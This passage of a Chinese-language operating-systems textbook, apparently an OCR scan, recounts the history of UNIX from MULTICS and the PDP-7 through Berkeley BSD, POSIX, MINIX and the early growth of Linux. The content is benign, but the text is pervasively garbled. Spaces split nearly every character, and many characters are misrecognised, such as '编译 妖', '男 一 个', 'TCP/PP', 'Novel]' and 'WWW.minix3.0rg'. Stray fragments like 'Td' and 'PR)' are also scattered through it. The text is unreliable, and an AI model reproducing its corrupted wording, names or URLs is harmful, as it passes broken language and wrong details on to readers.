这 个 项 目 ， 仅 留 下 一 位 研究 人 员 Ken Thompson 寻 找 一 些 有 意思 的 东西 继 
续 研 究 。 他 最 终 决定 在 一 台 废 弃 的 PDP-7 小 型 机 上 自己 写 一 个 精简 版 的 
MULTICS (当时 使 用 汇编 语言 》。 尽 管 PDP-7 体 积 很 小 ， 但 是 
Thompson 的 系统 实际 上 可 以 工作 并 且 能 够 支持 他 的 开发 成 果 。 随 后 ， 
Bell 实 验 室 的 另 一 位 研究 者 Brian Kernighan 有 点 开玩笑 地 把 它 叫 做 
UNICS (UNiplexed Information and Computing Service， 单 路 信息 与 计算 
服务 ) 。 尺 和 绾 EUNUCHS” 的 双关 语 是 对 MULTICS 的 删 减 ， 但 是 这 个 名 
字 保 留 了 下 来 ， 虽 然 其 拼写 后 来 变 成 了 UNIX。 


10.1.2 PDP-11 UNIX 








Thompson 的 工作 给 很 多 他 在 Bell 实 验 室 的 同事 留 下 了 深刻 的 印象 ， 
很 快 Dennis Ritchie 加 入 进来 ， 接 着 是 他 所 在 的 整个 部 门 。 在 这 上段 时 间 ， 
UNIX 系 统 有 两 个 重大 的 发 展 。 第 一 ，UNIX 从 过 时 的 PDP-7 计 算 机 移植 
到 更 现代 化 的 PDP-11/20， 然 后 是 PDP-11/45 和 PDP-11/70。 后 两 种 机 器 
在 20 世 纪 70 年 代 占 据 了 小 型 计算 机 的 主要 市 场 。PDP-11/45 和 PDP-11/70 
的 功能 更 为 强大 ， 有 着 在 当时 较 大 的 物理 内 存 (分别 为 256KB 与 
2MB)〉。 同 时 ， 它 们 有 内 存 保护 人 硬件， 从 而 可 以 同时 支持 多 个 用 户 。 然 
而 ， 它 们 都 是 16 位 机 器 ， 从 而 限制 了 单个 进程 只 能 拥有 64KB 的 指令 衬 
间 和 64KB 的 数据 空间 ， 即 使 机 器 能 够 提供 远大 于 此 的 物理 内 存 。 











第 二 个 发 展 则 与 编号 UNIX 的 编程 语言 有 关 。 直 到 现在 ， 为 每 台新 
机 器 重 写 整个 系统 显然 是 一 件 很 无 趣 的 事情 ， 因 此 Thompson 决 定 用 自 
己 设计 的 一 种 高 级 语言 B 重 写 UNIX。B 是 BCPL 的 简化 版 (BCPL 自 己 是 
CPL 的 简化 版 ， 而 CPL 就 像 PL/I 一 样 从 来 没有 好 用 过 〉 。 由 于 B 的 种 种 缺 
陷 ， 尤 其 是 缺乏 数据 结构 ， 这 次 尝试 并 不 成 功 。 接 着 Ritchie 设 计 了 B 语 
言 的 后 继 者 ， 很 自然 地 命名 为 C。Ritchie 同 时 为 C 编 写 了 一 个 出 色 的 编 
译 妖 。Thompson 和 Ritchie 一 起 工作 ， 用 C 重 写 了 UNIX。C 是 恰当 的 时 间 
出 现 的 一 种 恰当 的 语言 ， 从 此 统治 了 操作 系统 编程 。 











1974 年 ，Ritchie 和 和 Thompson 发 表 了 一 篇 关于 UNIX 的 里 程 碑 式 的 论 
文 〈Ritchie 和 Thompson，1974) 。 由 于 他 们 在 论文 中 介绍 的 工作 ， 他 们 
随后 获得 了 享有 盛誉 的 图 灵 奖 (Ritchie, 1984; Thompson, 1984) 。 这 
篇 论文 的 发 表 使 许多 大 学 疝 Bell 实 验 室 索要 UNIX 的 复制 。 由 于 Bell 实 验 
室 的 母 公 司 AT&T 在 当时 作为 垄断 企业 受到 监管 ， 不 允许 经 营 计算 机 业 
务 ， 它 很 愿意 能 够 通过 向 大 学 出 售 UNIX 获 取 适 度 的 费用 。 














一 个 偶然 事件 往往 能 够 决定 历史 。PDP-11 正 好 是 几乎 所 有 大 学 的 计 
算 机 系 选择 的 计算 机 ， 而 PDP-11 预 装 的 操作 系统 使 大 量 的 教授 与 学 生 望 
而 生 綦 。UNIX 很 快 地 填补 了 这 个 空白 。 这 在 很 大 程度 上 是 因为 UNIX 提 
供 了 全 部 的 源 代码 ， 人 们 可 以 (实际 上 也 这 么 做 了 ) 不 断 地 进行 修补 。 
大 量 科学 会 议 围绕 UNIX 举 行 ， 在 会 上 杰出 的 演讲 者 们 站 在 台 上 介绍 他 
们 在 系统 核心 中 找到 并 改正 的 隐蔽 错误 。 一 位 澳大利亚 教授 John Lions 
用 通常 是 为 乔 丰 (Chaucer) 或 莎士比亚 〈Shakespeare) 作品 保留 的 格 
式 为 UNIX 的 源 代 码 编写 了 注释 〈1996 年 以 Lions 的 名 义 重 新 印刷 ) 。 这 
本 书 介 绍 了 版 本 6， 之 所 以 这 么 命名 是 因为 它 出 现在 UNIX 程 序 员 手 册 的 
第 6 版 中 。 源 代码 包含 8200 行 C 代 码 以 及 900 行 汇编 代码 。 由 于 以 上 所 有 
这 些 活动 ， 关 于 UNIX 系 统 的 新 想法 和 改进 迅速 传播 开 来 。 














在 几 年 内 ， 版 本 6 被 版 本 7 代替 ， 后 者 是 UNIX 的 第 一 个 可 移植 版 本 
(运行 在 PDP-11 以 及 Interdata 8/32 上 ) ， 已 经 有 18 800 行 C 代 码 以 及 2100 
行 汇 编 代码 。 在 版 本 7 上 培养 了 整整 一 代 的 学 生 ， 这 些 学 生 毕 业 去 业界 





工作 后 促进 了 它 的 传播 。 到 了 20 世 纪 80 年 代 中 期 ， 各 个 版 本 的 UNIX 在 
小 型 机 与 工程 工作 站 上 已 广 为 使 用 。 很 多 公司 甚至 买 下 源 代码 版 权 开 发 
目 己 的 UNIX 版 本 ， 其 中 有 一 家 年 轻 小 公司 叫做 Microsoft (wa) ， 它 


以 XENIX 的 名 义 出 售 版 本 7 好 几 年 了 ， 直 到 它 的 兴趣 转移 到 了 其 他 方向 
el 


10.1.3 ”可 移植 的 UNIX 


既然 UNIX 是 用 C 编 写 的 ， 将 它 移动 或 者 移植 《正式 说 法 ) 到 一 台新 
机 器 上 比 早 先 的 时 候 要 容易 多 了 。 移 植 首 先 需要 为 新 机 器 写 一 个 C 编 译 
器 ， 然 后 需要 为 新 机 器 的 IO 设备 ， 如 显示 器 、 打 印 机 、 和 磁盘 等 编写 设 
备 驱动 。 虽 然 驱动 的 代码 是 用 C 写 的 ， 但 由 于 没有 两 个 磁盘 按照 同样 的 
方式 工作 ， 它 不 能 被 移植 到 男 一 台 机 器 ， 并 在 那 台 机 占 上 编译 运行 。 最 
终 ， 一 小 部 分 依赖 于 机 器 的 代码 ， 如 中 断 处 理 或 内 存 管理 程序 ， 必 须 重 
写 ， 通 季 使 用 汇编 语言 。 





从 PDP-11 向 外 的 第 一 次 移植 是 到 Interdata 8/32 小 型 机 上 。 这 次 实践 
显示 出 UNIX 在 设计 时 暗含 了 一 大 批 关 于 系统 运行 机 器 的 假定 ， 例 如 假 
定 整 型 的 大 小 为 16 位 ， 指 针 的 大 小 也 是 16 位 (上 暗示 程序 最 大 容量 为 
64KB) ， 还 有 机 器 刚好 有 三 个 寄存 器 存放 重要 的 变量 。 这 些 假定 没有 
一 个 与 Interdata 机 器 的 情况 相符 ， 因 此 整理 修改 UNIX 需 要 大 量 的 工作 。 

















另 一 个 问题 来 自 Ritchie 的 编译 器 。 尽 管 它 速度 快 ， 能 够 产生 高 质量 
的 目标 代码 ， 这 些 代 码 只 是 基于 PDP-11 机 器 。 有 别 于 针对 Interdata 机 器 
写 一 个 新 编译 器 的 通常 做 法 ，Bell 实 验 室 的 Steve Johnson 设 计 并 实现 了 
可 移植 的 C 纺 译 希 ， 只 需要 适量 的 修改 工作 就 能 够 为 任何 设计 合理 的 机 
器 生成 目标 代码 。 多 年 以 来 ， 除 了 PDP-11 以 外 几乎 所 有 机 器 的 C 编 译 器 


都 是 基于 Johnson 的 编译 器 ， 因 此 Johnson 的 工作 极 大 地 促进 了 UNIX 在 新 
计算 机 上 的 普及 。 


由 于 所 有 的 开发 工作 都 必须 在 惟一 可 用 的 UNIX 机 器 PDP-11 上 进 
行 ， 这 台 机 器 正好 在 Bell 实 验 室 的 第 五 层 ， 而 Interdata 在 第 一 层 ， 因 此 
最 初 向 Interdata 机 器 的 移植 进度 缓慢 。 生 成 一 个 新 版 本 意味 着 在 五 楼 编 
译 ， 然 后 把 一 个 磁带 搬 到 一 楼 去 检查 这 个 版 本 是 否 能 用 。 在 搬 了 几 个 月 
的 磁带 后 ， 有 人 提出 :“ 要 知道 我 们 是 一 家 电话 公司 ， 为 什么 我 们 不 把 
两 台 机 器 用 电线 连接 起 来 ? ”这 样 UNIX 网 络 诞生 了 。 在 移植 到 Interdata 
之 后 ，UNIX 又 移植 到 VAX 和 其 他 计算 机 上 。 











在 AT&T 于 1984 年 被 美国 政府 拆 分 后 ， 它 获得 了 设立 计算 机 子 公司 
的 法 律 许可 ， 并 很 快 就 这 样 做 了 。 不 入，AT&T 发 布 了 第 一 个 商业 化 的 
UNIX 产 品 一 一 System III。 它 并 没有 被 很 好 地 接受 ， 因 此 在 一 年 之 后 就 
被 一 个 改进 的 版 本 System V 取 代 。 关 于 System IV 发 生 了 什么 是 计算 机 科 
学 史上 最 大 的 未 解 之 谜 之 一 。 最 初 的 System V 很 快 就 被 System V 的 第 2 
版 ， 第 3 版 ， 接 着 是 第 4 版 取代 ， 每 一 个 新 版 本 都 更 加 庞大 和 复杂 。 在 这 
个 过 程 中 ，UNIX 系 统 背后 的 初始 思想 ， 即 一 个 简单 、 精 致 的 系统 ， 逐 
渐 地 消失 了 。 虽 然 Ritchie 与 Thompson 的 小 组 之 后 开发 了 UNIX 的 第 8、 第 
9 与 第 10 版 ， 由 于 AT&T 把 所 有 的 商业 力量 都 投入 到 推广 System VF, 
它们 并 没有 得 到 广泛 的 传播 。 然 而 ，UNIX 的 第 8、 第 9 与 第 10 版 的 部 分 


思想 被 最 终 包含 在 System V 中 。AT&T 最 后 决定 ， 它 毕竟 是 一 家 电话 公 














司 而 不 是 一 家 计算 机 公司 ， 因 此 把 UNIX 的 生意 在 1993 年 卖 给 了 

Novell。Novel] 随 后 在 1995 年 把 它 又 卖 给 了 Santa Cruz Operation。 那 时 候 
谁 拥有 UNIX 的 生意 已 经 无 关 紧 要 了 ， 因 为 所 有 主要 的 计算 机 公司 都 已 
经 拥有 了 其 许可 证 。 


10.1.4 Berkeley UNIX 


加 州 大 学 伯克利 分 校 〈(University of California at Berkeley) 是 早期 
获得 UNIX 第 6 版 的 众多 大 学 之 一 。 由 于 获得 了 整个 源 代码 ，Berkeley 可 
以 对 系统 进行 充分 的 修改 。 在 ARPA (Advanced Research Project 
Agency, 【美国 国防 部 ) MAUR) 的 赞助 下 ，Berkeley 开 发 并 
发 布 了 针对 PDP-11 的 UNIX 改 进 版 本 ， 称 为 1BSD (First Berkeley 
Software Distribution，Berkeley 软 件 发 行 第 1 版 ) 。 这 个 版 本 之 后 很 快 有 
男 一 个 版 本 紧 随 ， 称 作 2BSD， 它 也 是 为 PDP-11 开 发 的 。 








更 重要 的 版 本 是 3BSD， 尤 其 是 其 后 继 者 ， 为 VAX 开 发 的 4BSD。 虽 
然 AT&T 发 布 了 一 个 VAX 上 的 UNIX 版 本 称 为 32V， 这 个 版 本 本 质 上 是 
UNIX 第 7 版 ， 但 是 ， 相 比 之 下 ，4BSD 包 含 一 大 批改 进 。 最 重要 的 改进 
是 应 用 了 虚拟 内 存 与 分 页 ， 使 得 程序 能 够 按照 需求 将 其 一 部 分 调 入 或 调 
出 内 存 ， 从 而 使 程序 能 够 比 物理 内 存 更 大 。 男 一 个 改进 是 允许 文件 名 长 
于 14 个 字符 。 文 件 系统 的 实现 方式 也 发 生 了 变化 ， 其 速度 得 到 了 显著 的 
提高 。 信 和 号 处 理 变 得 更 为 可 靠 。 网 络 的 引入 使 得 其 使 用 的 网 络 协议 
TCP/PP 成 为 UNIX 世 界 的 实际 标准 。 因 为 Internet 由 基于 UNIX 的 服务 器 统 
治 ，TCP/IP 接 着 也 成 为 了 Internet 的 实际 标准 。 











Berkeley 也 为 UNIX 添 加 了 许多 应 用 程序 ， 包 括 一 个 新 的 编辑 器 


(vi) 、 一 个 新 的 shell (csh) 、Pascal 与 Lisp 的 编译 器 ， 以 及 很 多 其 他 
程序 。 所 有 这 些 改进 使 得 Sun Microsystems，DEC 以 及 其 他 计算 机 销售 
商 基 于 Berkeley UNIX 开 发 它们 自己 的 UNIX 版 本 ， 而 不 是 基于 AT&T 
的 “官方 ”版 本 System V。 因 此 Berkeley UNIX 在 教学 、 研 究 以 及 国防 领域 
的 地 位 得 到 确立 。 如 果 和 希望 得 到 更 多 关于 Berkeley UNIX 的 信息 ， 请 碍 
阅 参考 文献 〈(MCcKusick 等 人 ，1996) 。 


10.1.5 ”标准 UNIX 


在 20 世 纪 80 年 代 后 期 ， 两 个 不 同 且 一 定 程度 上 不 相 兼 容 的 UNIX 版 
本 (4.3BSD 与 System V 第 3 版 ) 得 到 广泛 使 用 。 另 外 ， 几 乎 每 个 销售 商 
都 会 增加 自己 的 非 标准 增强 特性 。UNIX 世 界 的 这 种 分 裂 ， 加 上 二 进 制 
程序 格式 没有 标准 的 事实 ， 使 得 任何 软件 销售 商 编写 和 打包 的 UNIX 程 
序 都 不 可 能 在 其 他 UNIX 系 统 上 运行 “正如 MS-DOS 所 做 的 一 样 ) ， 从 
而 极 大 地 阻碍 了 UNIX 的 商业 成 功 。 各 种 各 样 标准 化 UNIX 的 尝试 一 开始 
都 失败 了 。 一 个 典型 的 例子 是 AT&T 发 布 的 SVID (System V Interface 
Definition，System 5 界面 定义 ) ， 它 定义 了 所 有 的 系统 调用 、 文 件 格式 
等 。 这 个 标准 尝试 使 所 有 System V 的 销售 商 保持 一 致 ， 然 而 它 在 敌对 阵 
(BSD) 中 直接 被 忽略 ， 没 有 任何 效果 。 


Td 


第 一 次 使 UNIX 的 两 种 流派 一 致 的 严肃 尝试 来 源 于 IEEE〈 它 是 一 个 
得 到 高 度 尊重 的 中 立 组 织 ) 标准 委员 会 的 赞助 。 有 上 百名 来 自 业 界 、 学 
界 以 及 政府 的 人 员 参 加 了 此 项 工作 。 他 们 共同 决定 将 这 个 项 目 命名 为 
POSIX。 前 三 个 字母 代表 可 移植 操作 系统 《Portable Operating 
System) ， 后 绥 IX 用 来 使 这 个 名 字 与 UNIX 的 构 词 相 似 。 











经 过 一 次 又 一 次 的 争论 与 辩驳 之 后 ，POSIX 委 员 会 制定 了 一 个 称 为 
1003.1 的 标准 。 它 规定 了 每 一 个 符合 标准 的 UNIX 系 统 必 须 提 供 的 库 函 


数 。 大 多 数 库 函数 会 引发 系统 调用 ， 但 也 有 一 些 可 以 在 系统 内 核 之 外 实 
现 。 典 型 的 库 函 数 包括 open，read 与 forkk。POSIX 的 思想 是 这 样 的 ， 一 

个 软件 销售 商 写 了 一 个 只 调用 了 符合 1003.1 标 准 函数 的 程序 ， 那 么 他 就 
可 以 确信 这 个 程序 可 以 在 任何 符合 标准 的 UNIX 系 统 上 运行 。 


PR) 
PR) 





的 确 大 多 数 标准 制定 机 构 都 会 做 出 令 人 厌恶 的 妥协 ， 在 标准 中 包含 
一 些 制定 这 个 标准 的 机 构 偏好 的 一 些 特性 。 在 这 点 上 ， 考 虑 到 制定 时 牵 
涉 到 的 大 量 相关 者 与 他 们 各 自 既 定 的 喜好 ，1003.1 做 得 非常 好 。IEEE 委 
员 会 并 没有 采用 System V 与 BSD 特 性 的 并 集 作为 标准 的 起 始点 (大 部 分 
的 标准 组 织 常 这 样 做 ) ， 而 是 采用 了 两 者 的 交集 。 非 常 粗略 地 说 ， 如 果 
一 个 特性 在 System V 与 BSD 中 都 出 现 了 ， 它 就 被 包含 在 标准 中 ， 和 否则 就 
被 排除 出 去 。 由 于 这 种 做 法 ，1003.1 与 System V 和 BSD 两 者 的 共同 祖先 
UNIX 第 7 版 有 着 很 强 的 相似 性 。1003.1 文 档 的 编写 方式 使 得 操作 系统 的 
开发 者 与 软件 的 开发 者 都 能 够 理解 ， 这 是 它 在 标准 界 中 的 另 一 个 创新 之 
处 ， 即 使 这 方面 的 改进 工作 已 经 在 进行 之 中 。 




















虽然 1003.1 标 准 只 解决 了 系统 调用 的 问题 ， 但 是 一 些 相关 文档 对 线 
程 、 应 用 程序 、 网 络 及 UNIX 的 其 他 特性 进行 了 标准 化 。 男 外 ，ANSI 与 
ISO 组 织 也 对 C 语 言 进行 了 标准 化 。 


10.1.6 MINIX 


所 有 现代 的 UNIX 系 统 共 有 的 一 个 特点 是 它们 又 大 又 复杂 。 在 这 点 
上 ， 与 UNIX 的 初衷 背道而驰 。 即 使 源 代码 可 以 免费 得 到 〈 在 大 多 数 情 
况 下 并 不 是 这 样 ) ， 单 纯 一 个 人 不 再 能 够 理解 整个 系统 。 这 种 情况 导致 
本 书 的 作者 编写 了 一 个 新 的 类 UNIX 系 统 ， 它 足够 小 ， 因 而 比较 容易 理 
解 。 它 的 所 有 源 代码 公开 ， 可 以 用 作 教 学 目的 。 这 个 系统 由 11 800 行 C 
代码 以 及 800 行 汇编 代码 构成 。 它 于 1987 年 发 布 ， 在 功能 上 与 UNIX 第 7 
版 几乎 相同 ， 后 者 是 PDP-11 时 代 大 多 数 计算 机 科学 系 的 中 流 克 柱 。 





MINIX 属 于 最 早 的 一 批 基 于 微 内 核 设 计 的 类 UNIX 系 统 。 微 内 核 背 
后 的 思想 是 在 内 核 中 只 提供 最 少 的 功能 ， 从 而 使 其 可 靠 和 高 效 。 因 此 ， 
内 存 管理 和 文件 系统 被 作为 用 户 进程 实现 。 内 核 只 负责 进程 间 的 信息 传 
递 。 内 核 包含 1600 行 C 代 码 以 及 800 行 汇编 代码 。 由 于 与 8088 体 系 结构 相 
关 的 技术 原因 ，IO 设 备 驱动 〈 增 加 2900 行 C 代 码 ) 也 在 内 核 中 。 文 件 系 
统 (5100 行 C 代 码 ) 与 内 存 管 理 〈2200 行 C 代 码 ) 作为 两 个 独立 的 用 户 


进程 运行 。 





由 于 高 度 模块 化 的 结构 ， 微 内 核 相对 于 单 核 系统 有 着 易 于 理解 和 维 
护 的 人 优点。 同时， 由 于 一 个 用 户 态 进程 朋 湿 后 造成 的 损害 要 远 小 于 一 个 
内 核 组 件 衣 浊 后 造成 的 损害 ， 因 此 将 功能 代码 从 内 核 移 到 用 户 态 后 ， 系 





统 会 更 加 可 靠 。 微 内 核 的 主要 缺点 是 用 户 态 与 内 核 态 的 额外 切换 会 带 来 
较 大 的 性 能 损失 。 然 而 ， 性 能 并 不 代表 一 切 : 所 有 现代 的 UNIX 系 统 为 
获得 更 好 的 模块 性 在 用 户 态 运行 X-windows， 同 时 容忍 其 带 来 的 性 能 损 
失 “《 与 此 相反 的 是 windows， 其 中 整个 GUI 运行 在 内 核 中 ) 。 在 那个 时 
代 ， 其 他 的 著名 微 内 核 设计 包括 Mach (Accetta 等 人 ，1986) 和 
Chorus (Rozier 等 人 ，1988) 。 





在 问世 几 个 月 之 内 ，MINIX 在 自己 的 USENET【〔 现 在 的 Google〉 新 
闻 组 comp.os.minix 以 及 超过 40 000 名 使 用 者 中 风靡 一 时 。 很 多 使 用 者 提 
供 了 命令 和 其 他 用 户 程序 ，MINIX 从 而 变 成 了 一 个 由 互联 网 上 的 众多 使 
用 者 完成 的 集体 项 目 。 它 是 之 后 出 现 的 其 他 集体 项 目的 一 个 原型 。1997 
年 ，MINIX 第 2 版 发 布 ， 其 基本 系统 包含 了 网 络 ， 并 且 代 码 量 增长 到 了 
62 200 行 。 


2004 年 左右 ，MINIX 发 展 方向 发 生 了 巨大 的 变化 ， 它 聚焦 到 发 展 一 
个 极其 可 靠 、 可 依赖 的 系统 ， 能 够 自动 修复 自身 错误 并 且 自 恢复 ， 即 使 
在 可 重复 软件 缺陷 被 触发 的 情况 下 也 能 够 继续 正常 工作 。 因 此 ， 第 1 版 
中 的 模块 化 思想 在 MINIX 3.0 中 得 到 极 大 扩展 ， 几 乎 所 有 的 设备 驱动 被 
移 到 了 用 户 空 间 ， 每 一 个 驱动 作为 独立 的 进程 运行 。 整 个 核心 的 大 小 突 
然 降 到 不 到 4000 行 代码 ， 因 此 一 个 单独 的 程序 员 可 以 轻易 地 理解 。 为 了 
增强 容错 能 力 ， 系 统 的 内 部 机 制 在 很 多 地 方 发 生 了 改变 。 








另外 ， 超 过 500 种 流行 的 UNIX 程 序 被 移植 到 MINIX 3.0， 包 括 X 


Window 系 统 ( 有 时候 只 用 X 代 表 ) 、 各 种 各 样 的 编译 器 〈 包 括 gcc) 、 
文本 处 理 软件 、 网 络 软件 、 浏 览 器 以 及 其 他 很 多 程序 。 与 以 前 的 版 本 在 
本 质 上 主要 是 教学 用 途 不 同 ， 从 MINIX 3.0 开 始 拥有 高 可 用 性 ， 并 聚 
在 高 可 靠 性 上 。MINIX 的 最 终 目 标 是 :取消 复位 键 。 








聚焦 





本 书 的 第 三 成 中 介绍 了 这 个 新 系统 ， 在 附录 中 还 有 源 代 码 和 详细 介 
绍 〈Tanenbaum 和 Woodhull，2006) 。MINIX 继 续 发 展 ， 并 有 着 一 个 活 
跃 的 用 户 群 体 。 如 果 需 要 更 多 细节 或 免费 获取 最 新 版 本 ， 请 访问 


WWW.minix3.0rg。 





10.1.7 Linux 


在 互联 网 上 关于 MINIX 的 讨论 和 发 展 的 早期 ， 很 多 人 请 求 〈 在 很 多 
情况 下 是 要 求 ) 添加 更 多 更 好 的 特性 。 对 于 这 些 请 求 作 者 通常 
说 “不 ”( 为 使 系统 足够 小 ， 使 学 生 在 一 个 学 期 的 大 学 课程 中 就 能 完全 理 
解 ) 。 持 续 的 拒绝 使 很 多 使 用 者 感到 厌倦 。 但 当时 还 没有 FreeBSD， 因 
此 这 些 用 户 没 有 其 他 选择 。 这 样 的 情况 过 了 很 多 年 ， 直 到 一 位 芬兰 学 生 
Linus Torvalds 决 定编 写 男 外 一 个 类 UNIX 系 统 ， 称 为 Linux。Linux 将 会 
是 一 个 完备 的 系统 产品 ， 拥 有 许多 MINIX 一 开始 缺乏 的 特性 。Linux 的 
第 1 个 版 本 0.01 在 1991 年 发 布 。 它 在 一 台 运 行 MINIX 的 机 器 上 交叉 开 
发 ， 从 MINIX 借 用 了 从 源码 树 结 构 到 文件 系统 设计 的 很 多 思想 。 然 而 它 
是 一 种 整体 式 设计 ， 将 整个 操作 系统 包含 在 内 核 之 中 ， 而 非 MINIX 那 样 
的 微 内 核 设计 。Linux0.01 版 本 共有 9300 行 C 代 码 和 950 行 汇编 代码 ， 大 
至 上 与 MINIX 版 本 大 小 接近 ， 功 能 也 差不多 。 事 实 上 ，Linux 就 是 
Torvalds 对 MINIX 的 一 次 重 写 ， 当 时 ， 他 也 只 能 得 到 MINIX 系 统 的 源 代 
码 了 。 


当 加 入 了 虚拟 内 存 、 一 个 更 加 复杂 的 文件 系统 以 及 更 多 的 特征 之 
后 ，Linux 的 大 小 急速 增长 ， 并 且 演 化 成 了 一 个 完整 的 UNIX 克 隆 产 品 。 
虽然 ， 在 刚 开始 ，Linux 只 能 运行 在 386 机 器 上 甚至 把 386 汇 编 代码 咀 
入 到 了 C 程 序 中 间 ) ， 但 是 很 快 就 被 移植 到 了 其 他 平台 上 ， 并 且 现 在 像 


UNIX 一 样 ， 能 够 运行 在 各 种 类 型 的 机 器 上 。 尽 管 如 此 ，Linux 和 UNIX 
之 间 还 是 有 一 个 很 明显 的 不 同 : Linux 利 用 了 gcc 编 译 器 的 很 多 特性 ， 需 
要 做 大 量 的 工作 ， 才 能 使 Linux 能 够 被 ANSI 标 准 C 编 译 器 编译 。 





接 下 来 的 一 个 主要 的 Linux 发 行 版 是 1994 年 发 布 的 版 本 1.0。 它 大 概 
有 165 000 行 代码 ， 并 且 包 含 了 一 个 新 的 文件 系统 、 内 存 映 射 文 件 和 可 
以 与 BSD 相 容 的 带 有 套 接 字 和 TCP/IP 的 网 络 。 它 同时 也 包含 了 一 些 新 的 
驱动 程序 。 在 接 下 来 的 两 年 中 ， 发 布 了 几 个 轻微 修订 版 本 。 











到 这 个 时 候 ，Linux 已 经 和 UNIX 充 分 兼容 ， 大 量 的 UNIX 软 件 都 被 
移植 到 了 Linux 上 ， 使 得 它 比 起 以 前 具有 了 更 强 的 可 用 性 。 另 外 ， 大 量 
的 用 户 被 Linux 所 吸引 ， 并 且 在 Torvalds 的 整体 管理 下 开始 用 多 种 方法 对 
Linux 的 代码 进行 研究 和 扩展 。 





之 后 一 个 主要 的 发 行 版 ， 是 1996 年 发 布 的 2.0 版 本 。 它 由 大 约 470 
000 行 C 代 码 和 8000 行 汇编 代码 组 成 。 它 包含 了 对 64 位 体系 结构 的 支持 、 
对 称 多 道 程序 设计 、 新 的 网 络 协 议和 许多 的 其 他 特性 。 一 个 可 扩展 设备 
驱动 程序 集 占用 了 总 代码 量 的 很 大 一 部 分 。 随 后 ， 很 快 发 行 了 另外 的 版 
本 。 


Linux 内 核 的 版 本 号 由 四 个 数字 组 成 ，A.B.C.D， 如 2.6.9.11。 第 一 个 
数字 表示 内 核 的 版 本 。 第 二 个 数字 表示 第 几 个 主要 修订 版 。 在 2.6 版 本 
内 核 之 前 ， 偶 数 版 本 号 相当 于 内 核 的 稳定 发 行 版 ， 而 奇数 版 本 号 则 相当 


于 不 稳定 的 修订 版 ， 即 开发 版 。 在 2.6 版 本 内 核 中 ， 不 再 是 这 种 情况 
了 。 第 三 个 数字 表示 次 要 修订 版 ， 比 如 支持 了 新 的 驱动 程序 等 。 第 四 个 
数字 则 与 小 的 错误 修正 或 安全 补丁 相关 。 


大 量 的 标准 UNIX 软 件 移 植 到 了 Linux 上 ， 包 括 X 窗 口 系统 和 大 量 的 
网 络 软件 。 也 有 人 为 Linux 开 发 了 两 个 不 同 的 GUI (GNOME 和 KDE) 。 
简 而 言 之 ，Linux 已 经 成 长 为 一 个 完整 的 UNIX 翻 版 ， 包 括 了 UNIX 爱 好 
者 想 要 的 所 有 特性 。 





Linux 的 一 个 独特 的 特征 是 它 的 商业 模式 : 它 是 自由 软件 。 它 可 以 
从 互联 网 上 的 很 多 站 点 中 下 载 到 ， 比 如 : www.kernel.org。Linux 带 有 一 
个 由 自由 软件 基金 会 (FSF) 的 创建 者 Richard Stallman 设 计 的 许可 。 尽 
管 Linux 是 自由 的 ， 但 是 它 的 这 个 许可 GPL (GNU 公 共 许 可 ) ， 比 微软 
Windows 的 许可 更 长 ， 并 且 规 定 了 用 户 能 够 使 用 代码 做 什么 以 及 不 能 做 
什么 。 用 户 可 以 自由 地 使 用 、 复 制 、 修 改 以 及 传播 源 代码 和 二 进 制 代 
码 。 主 要 的 限制 是 以 Linux 内 核 为 基础 开发 的 产品 不 能 只 以 二 进 制 形 式 
《可 执行 文件 出 售 或 分 发 ， 其 源 代码 必须 要 么 与 产品 一 起 发 送 ， 要 人 么 
可 以 随意 索取 。 











虽然 Torvalds 仍 然 相 当 紧 密 地 控制 着 Linux 的 内 核 ， 但 是 Linux 的 大 
量 用 户 级 程序 是 由 其 他 程序 员 编 写 的 。 他 们 中 的 很 多 人 一 开始 是 从 
MINIX、BSD 或 GNU 在 线 社区 转移 过 来 的 。 然 而 ， 随 着 Linux 的 发 展 ， 
越 来 越 少 的 Linux 社 区 成 员 想 要 破译 源 代码 (有 上 百 本 介绍 怎样 安装 和 





使 用 Linux 的 书 ， 然 而 只 有 少数 书 介绍 源 代码 以 及 其 工作 机 理 ) 。 同 
时 ， 很 多 Linux 用 户 放弃 了 互联 网 上 免费 分 发 的 版 本 ， 转 而 购买 众多 竞 
争 商业 公司 提供 的 CD-ROM 版 本 。 在 一 个 流行 站 点 www.distrowatch.org 
上 上 列 出 了 现在 最 流行 的 100 种 Linux 版 本 。 随 着 越 来 越 多 的 软件 公司 开始 
销售 自制 版 本 的 Linux， 而 且 越 来 越 多 的 硬件 公司 承诺 在 他 们 出 售 的 计 
算 机 上 预 装 Linux， 自 由 软件 与 商业 软件 之 间 的 界限 变 得 愈 发 模糊 了 。 








作为 Linux 故 事 的 一 个 有 趣 的 脚注 ， 我 们 注意 到 在 Linux 变 得 越 来 越 
流行 时 ， 它 从 一 个 意 想 不 到 的 源头 AT&T) 获得 了 很 大 的 推动 。1992 
年 ， 由 于 缺乏 资金 ，Berkeley 决 定 在 推出 BSD 的 最 终 版 本 4.4BSD 后 停止 
开发 《4.4BSD 后 来 成 为 FreeBSD 的 基础 )。 由 于 这 个 版 本 几乎 不 包含 
AT&T 的 代码 ，Berkeley 决 定 将 这 个 软件 的 开源 许可 证 (不 是 GPL) 发 
布 ， 任 何人 可 以 对 它 做 任何 想 做 的 事情 ， 只 要 不 对 加 州 大 学 提出 诉讼 。 
AT&T 负 责 UNIX 的 子 公司 做 出 了 迅速 的 反应 一 一 正如 你 猜 的 那样 一 一 
它 提出 了 对 加 州 大 学 的 诉讼 。 同 时 ， 它 也 控告 了 BSDI， 一 家 由 BSD 开 
发 者 创立 、 包 装 系统 并 出 售 服务 的 公司 〈 正 像 Red Hat 以 及 其 他 公司 现 
在 为 Linux 所 做 的 那样 ) 。 由 于 4.4BSD 中 事实 上 不 含有 AT&T 的 代码 ， 
起 诉 是 依据 版 权 和 商标 侵犯 ， 包 括 BSDI 的 1-800-ITS-UNIX 那 样 的 电话 
号 码 。 虽 然 这 次 诉讼 最 终 在 庭 外 和 解 ， 它 把 FreeBSD 隔 离 在 市 场 之 外 ， 
却 给 了 Linux 足 够 的 时 间 发 展 壮大 。 如 果 这 次 诉讼 没有 发 生 ， 从 1993 年 
起 两 个 免费 、 开 源 的 UNIX 系 统 之 间 就 会 进行 激烈 的 竞争 : 由 处 于 统治 
地 位 的 、 成 熟 稳定 且 自 1977 年 起 就 在 学 界 得 到 巨大 文 持 的 系统 BSD 应 对 

















富有 活力 的 年 轻 挑战 者 、 只 有 两 年 历史 却 在 个 人 用 户 中 文 持 率 稳步 增长 
的 Linux。 谁 知道 这 场 免费 UNICES 的 战争 会 变 成 何 种 局 面 ? 








10.2 ”Linux 概述 





